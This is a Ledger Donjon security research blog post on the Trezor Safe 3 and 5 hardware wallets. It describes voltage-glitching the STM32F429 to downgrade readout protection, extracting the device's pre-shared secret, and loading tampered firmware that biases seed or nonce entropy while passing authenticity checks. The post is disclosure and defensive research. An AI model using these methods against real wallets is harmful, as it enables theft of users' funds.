Review and sign transactions from a single secure screen with Ledger Flex™

Discover now

Donjon | 03/12/2025

Why Secure Elements make a crucial difference to Hardware Wallet Security

Testing the security model of the Trezor Safe family

TL;DR

In contrast with the previous generations of Trezor devices, which the Ledger Donjon showed to be vulnerable to physical seed recovery attacks, the Trezor Safe line of products brings huge security improvements to the table, first and foremost with the use of a Secure Element to safeguard their user’s seed. Critical cryptographic operations are still performed on a microcontroller however, which makes attacks in more advanced threat models possible.

Introduction

Since its inception, the Ledger Donjon has made a point to continuously invest some of its time and resources towards conducting open security research on projects and devices relevant to the users and stakeholders of the crypto ecosystem. The goal of this research is not only to get vulnerabilities fixed or mitigated before they can be exploited by threat actors, but also to highlight the relationship between the architecture of a crypto-handling device, and the attacks that it can reasonably protect against.

Over the years, this has led the team to analyse the security of popular hardware wallets, including the Trezor One and Trezor T devices. Several critical vulnerabilities were found and responsibly disclosed to Trezor, who then worked hard to fix or mitigate the issues that could be mitigated by a software update. This has resulted in concrete and significant improvements in the security of all Trezor users, and thus of the crypto ecosystem as a whole.

However, the outcome of this particular stream of research has also been to show that the very blueprint on which those devices were built made them vulnerable to inexpensive attacks that allowed the seed (and thus, all the digital assets) of a user to be recovered, in the eventuality that the device were to be stolen or otherwise fall into the hands of an attacker, for even a short amount of time. 

Indeed both the Trezor One and the Trezor T rely on a regular microcontroller to safeguard the user’s seed. Unfortunately such microcontrollers are not designed to withstand hardware attacks, and voltage glitching attacks in particular were found to be effective in extracting their contents using only a very cheap setup.

In other words, we showed that relying only on such microcontrollers for protecting the user’s secrets was not a secure option, as long as the theft of the device was a relevant threat for the user – and it is undoubtedly a very likely scenario for most hardware wallet users. In contrast, the best way to durably safeguard against fault injection attacks (of which voltage glitching is but one of the cheapest and easiest instantiation), is to rely on chips specifically designed and rigorously tested to withstand physical attacks: Secure Elements.

Trezor Safe devices

In late 2023, the first member of a new lineup of hardware wallets was released by Trezor, the Trezor Safe 3, followed shortly thereafter by the Trezor Safe 5, released in mid 2024. Both wallets share the same general architecture, which marks a stark departure from the architecture of the Trezor devices of the past. Most notably, the Trezor Safe devices are now built around a two-chip design, one of which is a proper, EAL6+ certified Secure Element, paired with a regular microcontroller.

This is a huge win for security. In that architecture, the user’s PIN and cryptographic secrets are safeguarded by the Secure Element, whose primary function is to act as a secure storage element: when the correct PIN is provided, it will grant access to the user’s secrets.

The PIN verification, and PIN retry counter, are directly handled by the Secure Element, and the users’ secrets are not accessible anywhere in the memory of the coupled microcontroller when the device is locked. This effectively thwarts any inexpensive hardware attack, in particular voltage glitching, as was previously possible on the Trezor One and Trezor T – and gives users confidence that their funds are safe even if their device gets misplaced or stolen.

The Secure Element used in the Trezor Safe 3 and Trezor Safe 5 is an Optiga Trust M (aka SLS32) sold by Infineon. It consists of both an Integrated Circuit (the chip proper, made out of silicon-based transistors), and fixed, un-updateable software, programmed onto the chip by Infineon in their production lines. This software is fully closed source.

The Optiga therefore performs a very useful, but once-and-for-all fixed function, unrelated to crypto – and that notably allows for gating the use of previously generated cryptographic secrets behind the proof of knowledge of some information, for instance a PIN, or other sort of shared secret. This is already extremely useful, but it does mean that all crypto-related operations per se, like the actual cryptographic signing of blockchain transactions, still have to be performed on a run-of-the-mill microcontroller.

This inherently places some amount of security responsibility onto the microcontroller, and in particular on the integrity of the software that runs on it. Indeed, if an attacker were able to modify or otherwise control the software stored on the microcontroller flash memory, they could bias the manipulation of entropy that is at the heart of the crypto-related operations performed by the microcontroller, which would be devastating, as it would then allow an attacker to remotely gain access to all the user’s funds (more details on this below).

In other words, the new architecture of the Trezor Safe 3 and Trezor Safe 5 devices, incorporating an off-the-shelf, pre-programmed Secure Element, correctly addresses the threat of seed recovery on a stolen device, which is arguably one of the most severe and likely threats that a crypto-user faces. The importance of this really cannot be overstated. 

Other threats do exist however, and we set out to understand exactly how confident a user could be of the software that runs on their device, under the assumption that an attacker might have had access to its inner workings before it ended up in the hands of the user.

Firmware integrity – the attacker’s perspective

Let’s put ourselves in the shoes of an attacker for a moment then, and examine in more detail the attack surface of the Trezor Safe 3.

The microcontroller used is labeled TRZ32F429 – this is actually a STM32F429 chip packaged into a BGA with custom markings. In spite of the Trezor-specific package however, it is really electrically the same as a STM32F429, and this chip’s family is known to be vulnerable to voltage glitching, enabling read and write access to its flash contents. This is a very powerful primitive that we can leverage to mount an attack on the device as a whole. We only have to design a small adapter board, breaking out the TRZ32F429’s pads onto standard headers, so that we could mount it onto our main attack board.

The TRZ32F429 as found in the Trezor Safe 3, and the adapter board we designed for it.

Click for more technical details

The attack works as follows.

The STM32F4 has various configuration bytes stored in flash, including one called the RDP (for ReaDout Protection) level. It is stored on one byte, with a fault detection mechanism, but can really only assume three levels: RDP0, which amounts to no protection, RDP2, which is the strongest protection and is supposedly irreversible, and RDP1, a strict protection that still allows some very limited amount of debugging.

  • In RDP0, both ST’s built-in bootloader and the debug interface (for JTAG/SWD) allow to fully R/W all the flash memory of the device.
  • In RDP1, flash is not readable from those interfaces.
  • In RDP2, both the bootloader and the debug interface are disabled, and is the mode used in Trezor Safe 3 devices. Once in RDP2, it should be impossible to go back to RDP1 or 0.

As we said however, the RDP level is stored in flash, and to have any effect on the circuitry of, say, the debug interface, it first has to be somehow registered into digital logic. This is done during the boot phase of the device, before any instruction gets executed by the core. If a voltage glitch occurs during this fetch from flash, the RDP value read has a tendency to get corrupted. There is an error detection mechanism in place however, but the error case causes the device to read the RDP level as 1 – and sometimes, although much less often, the fault just happens to corrupt it into a valid state anyway. So with voltage glitching, the RDP level can be downgraded from 2 to 1.

This change would not persist across boots however, but we can make it permanent because the configuration bytes, for the most part, can be reprogrammed through the debug interface when RDP1 is active. Alas we cannot set the RDP level to 0 directly, as doing so would trigger the flash controller to mass erase the flash, which of course we do not want to do yet.

That can be very useful however, once any secret has been recovered, so as to be able to reprogram the chip at will – including rolling back write protection on any flash page.

But something else we can do when in RDP1 is to communicate with ST’s built-in bootloader, which we could not do in RDP2. The bootloader implements several commands, the most interesting of which for us being the READ_MEMORY command. As previously mentioned, when in RDP1, the reference manual indicates that flash memory is not readable while booting into the bootloader. As it so happens however, this is not enforced by any hardware mechanism (although it is for accesses made through the debug interface), but rather purely by the code of the bootloader itself.

In practice, a simple check is made against the RDP level, and the command is rejected if the chip is not in RDP0. This check can be glitched, and with the right glitch parameters and the right timing, it is possible to render it moot, and when that happens the command successfully returns 256 bytes of data read from an address of our choosing. To read more data, the glitch has to be repeated. For the Trezor Safe 3, the secret data is stored on 32 contiguous bytes, and thus can be read with a single successful READ_MEMORY glitch.


The Optiga is also, of course, present on the PCB, and implements a communication protocol to exchange commands and data with the microcontroller. The Optiga, beyond forbidding access to the user’s secrets unless the correct PIN has been provided, critically also serves a key role in the verification, by Trezor Suite, of the device’s genuineness. This is accomplished by the Optiga generating, during production, a secret/public key pair for itself, wrapping the public part into a certificate that is signed by Trezor. 

To verify the authenticity of a Trezor device, then, Trezor Suite submits a random challenge to the device, and the Optiga signs it. This signature, together with the certificate generated during production, allows to authenticate that this particular Optiga has been configured by Trezor, on their production line.

While powerful, this mechanism only authenticates the Optiga, not the microcontroller, and does not attest to what software is running on the latter. To try and include the microcontroller’s software into the check, then, a per-device pre-shared secret is used, once again provisioned in production, and known only to the Optiga and the microcontroller of a same Trezor Safe 3 device. The Optiga only accepts signature requests if the microcontroller it is attached to can prove that it has knowledge of this pre-shared secret.

This provides a link between the Optiga and the microcontroller, but a somewhat weak one: it does not, as such, attest to the software running on the microcontroller, but rather only to it having access to a pre-shared secret. As the latter is stored on the flash memory of the TRZ32F429, voltage glitching can be used to read it out, before arbitrarily reprogramming the chip, thereby preserving the full impression of an authentic device, while allowing the implementation of attacks that could lead to the remote recovery of all the user’s funds (for instance by biasing the generation of the seed, or manipulating the nonce of ECDSA signatures).


Click for more technical details

Let us get into a little more detail on this point. The seed is generated and stored (in encrypted form, in such a way that the right PIN has to be provided to the Optiga for it to be decryptable) on the microcontroller, thus corrupted software running on that microcontroller could very well bias the seed’s entropy, for instance reducing it to 32 bits – enough for collisions between victims to be unlikely, but fully enumerable for an attacker. The latter could just monitor all the corresponding addresses for any fund, and sign malign transactions to siphon away those funds at any moment they so choose.

Another option would be for the attacker to bias the entropy of the nonce generation of ECDSA signatures used in blockchain transactions. This nonce has to remain secret for the signature mechanism to be cryptographically sound (the signature, together with the nonce, can be used to compute back the secret key used for signing), but as the nonce is generated and manipulated on the microcontroller, corrupted software could bias it in an arbitrary manner, thereby allowing the attacker to recover the user’s secret keys, and all their funds.

Fortunately Trezor are fully aware of these two potential attacks, and have been working on making them more difficult to achieve – see for instance:

Starting from this architecture-level analysis, it is only a matter of time and engineering effort to pull off the attack in practice, which we were able to demonstrate. Crucially, the attack is implemented purely in software, and the cryptographic attestation of the device is fully preserved, as well as its electronics, thereby making the attack very hard, if not impossible, to detect either cryptographically or by visual inspection of the PCB (although note that we do have to desolder the MCU to mount it onto our attack setup, before soldering it back onto the PCB once the attack is done, which may leave so traces, especially if done by hand).

PCBs of two Trezor Safe 3, one running genuine software and the other running modified firmware.

Firmware check

This is not quite the full picture however, because another layer of protection has been implemented by Trezor, to try and detect devices running modified, non-genuine software, which as we saw, could put the user at risk. Specifically, when using the device with Trezor Suite, the latter sends a random challenge to the device, which then computes a hash incorporating both the challenge and its running firmware. This allows Trezor Suite to validate the result against a database of genuine software images, and is a very elegant protection.

The security of this mechanism relies on the fact that, because of the random challenge, the hash has to be recomputed in full by the device, every single time. An attacker cannot simply hardcode a hash and send it back to Trezor Suite, it really has to have the full software image at hand, so as to be able to compute the hash for any possible challenge. Given that the microcontroller has limited flash memory, this is a big impediment to any attacker trying to modify the software running on a device. Still, we were able to fully bypass this protection, proving that while very clever, it is not in itself robust enough to thwart determined attackers.


Click for more technical details

If you think about it, the parts of cryptography dealing with authenticity (rather than confidentiality and integrity) allow one to provide and verify the proof of knowledge of some data. This is usually used to prove knowledge of a sufficiently large, truly random secret key, as is the case for the authenticity check implemented using the Optiga in the Trezor Safe devices.

However the same cryptographic mechanisms can also be used to prove knowledge of arbitrary, non-necessarily secret data, and this is what is done in the firmware check. Of course, this is only secure as long as the memory of the microcontroller cannot be extended, and that the firmware image is not compressible.

The latter assumption is by necessity brittle though, as code is inherently structured data, and thus can be compressed. This is not to say that implementing an attack based on that possibility is easy however, and making the firmware harder to compress, for instance by avoiding leaving any blank space in flash, makes any attack harder to implement in practice.

This is not to say that this is not a useful addition to the security posture of the devices, on the contrary: it does make it harder to pull off the attack in practice. But it cannot stand alone, and in the end the overall security of the devices really does depend on the security of the underlying platform, here a microcontroller. This brings us to the Trezor Safe 5, which uses a more recent microcontroller from the STM32 line-up, the STM32U5, for which no fault injection attack has been made public at the time of this writing, and whose design explicitly takes into account the possibility of threats like voltage glitching. Although it still won’t be as secure as a Secure Element, this does improve the security of the devices, as compared with ones equipped with a TRZ32F429 – at least for a while.

Conclusion

We feel that it is part of the Donjon’s core missions to always push the boundaries of security in the crypto ecosystem so as to protect users, and we feel like it is working, with more and more devices taking hardware attacks into account and integrating Secure Elements in their architecture.

Just using a Secure Element does not mean that all threat scenarios are automatically rendered moot however, and together with the burgeoning of the crypto ecosystem, so too might burgeon more sophisticated and specialised threat actors, who might not choose to limit themselves to opportunistic attacks on stolen devices alone.

The Donjon will thus continue to research the security of crypto-manipulating devices, and strive to always better the security of the crypto ecosystem as a whole, under all the relevant threat models.


Charles Christen and Marion Lafon,
With much help from Karim Abdellatif, Baptistin Boilot and Olivier Hériveaux

Security Engineers

Stay in touch

Announcements can be found in our blog. Press contact:
[email protected]

Subscribe to our
newsletter

New coins supported, blog updates and exclusive offers directly in your inbox


Your email address will only be used to send you our newsletter, as well as updates and offers. You can unsubscribe at any time using the link included in the newsletter.

Learn more about how we manage your data and your rights.